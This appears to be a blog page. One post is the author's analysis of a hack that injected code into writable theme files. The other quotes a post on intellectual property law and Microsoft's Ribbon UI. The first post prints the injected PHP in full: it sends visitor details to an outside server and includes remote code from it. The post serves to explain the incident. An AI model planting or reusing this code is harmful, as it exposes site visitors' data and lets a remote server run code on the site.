Fooling Around

A while ago I found the website irresponsible while administrative dashboard remained worked fine. It appeared to be a problem with hosting or ISP from the start but later when the problem did not appear to be going to go, I decided to check if my theme files are writable by the web server… and I found the engine of the blog hacked and hacked exactly through mentioned loophole.

It is convenient to have theme files accessible for write through web server because it allows theme modification using dashboard but this is insecure and finally someone used this. The update of the theme files seems to be automated (batch operation) because file some whitespace and formatting was lost (this may be a consequence of modification through engine dashboard though) and < /html> tag was stripped from the templates.

The following code was inserted into PHP template immediately before the < /body> tag (inserted once per source code  file into last PHP < ? tag before the < /body > tag, to be exact):

error_reporting(0);
$a=(isset($_SERVER[“HTTP_HOST”]) ? $_SERVER[“HTTP_HOST”] : $HTTP_HOST);
$b=(isset($_SERVER[“SERVER_NAME”]) ? $_SERVER[“SERVER_NAME”] : $SERVER_NAME);
$c=(isset($_SERVER[“REQUEST_URI”]) ? $_SERVER[“REQUEST_URI”] : $REQUEST_URI);
$g=(isset($_SERVER[“HTTP_USER_AGENT”]) ? $_SERVER[“HTTP_USER_AGENT”] : $HTTP_USER_AGENT);
$h=(isset($_SERVER[“REMOTE_ADDR”]) ? $_SERVER[“REMOTE_ADDR”] : $REMOTE_ADDR);
$n=(isset($_SERVER[“HTTP_REFERER”]) ? $_SERVER[“HTTP_REFERER”] : $HTTP_REFERER);
$str=base64_encode($a).”.”.base64_encode($b).”.”.base64_encode($c).”.”.base64_encode($g).”.”.base64_encode($h).”.”.base64_encode($n);
if((include_once(base64_decode(“aHR0cDovLw==”).base64_decode(“dXNlcjcucGhwaW5jbHVkZS5ydQ==”).”/?”.$str))) { } else
{ include_once(base64_decode(“aHR0cDovLw==”).base64_decode(“dXNlcjcucGhwaW5jbHVkZS5ydQ==”).”/?”.$str); }

What is this? “aHR0cDovLw==” means “http://”, “dXNlcjcucGhwaW5jbHVkZS5ydQ==” stands for “user7.phpinclude.ru” and thus server and visitor information was sent to remote hacker’s server http://user7.phpinclude.ru/? … I am using this opportunity to say “Hi” or “Preved”, whichever is more appropriate, to our new friends from Russia…By the way, Google knows a lot about these guys already.

An educating post from Joe Andrieu on Microsoft‘s Ribbon UI:

There are a few ways that courts currently recognize Intellectual Property protection. I’m not a lawyer, but I have taken a few classes and dealt with it as a technology entrepreneur. So, take this with a grain of salt, especially as I am likely to be too
broad or simplistic here.

The most likely protection they would use would be trademark, copyright, and
patent. These are often jointly described as
Intellectual Property, but are treated under the law differently. Microsoft is
also trying to establish a contractual agreement that
creates further protection.

Trademark only applies if the use confuses users into thinking the product is a
Microsoft product. That’s not too hard to
work-around as long as you aren’t mimicking office functionality directly.
Trademarks apply to marks on goods or services used in
commerce. It happens automatically upon use, but may be bolstered by labelling
(TM) and registration, which allows (R). It can also
be applied to trade “dress,” which is a unique presentation, packaging, or
appearance of a product.

Copyright applies to any expression of an idea, and particularly unique
expressions are definitely protected. It does not however,
apply to utility. That is, the function of the interface is not copyrightable,
only its expression, which I would interpret as its
unique visual characteristics. Copyright applies to all expressive (creative)
works, automatically; it does not require prior
approval by any agency.

Continue reading →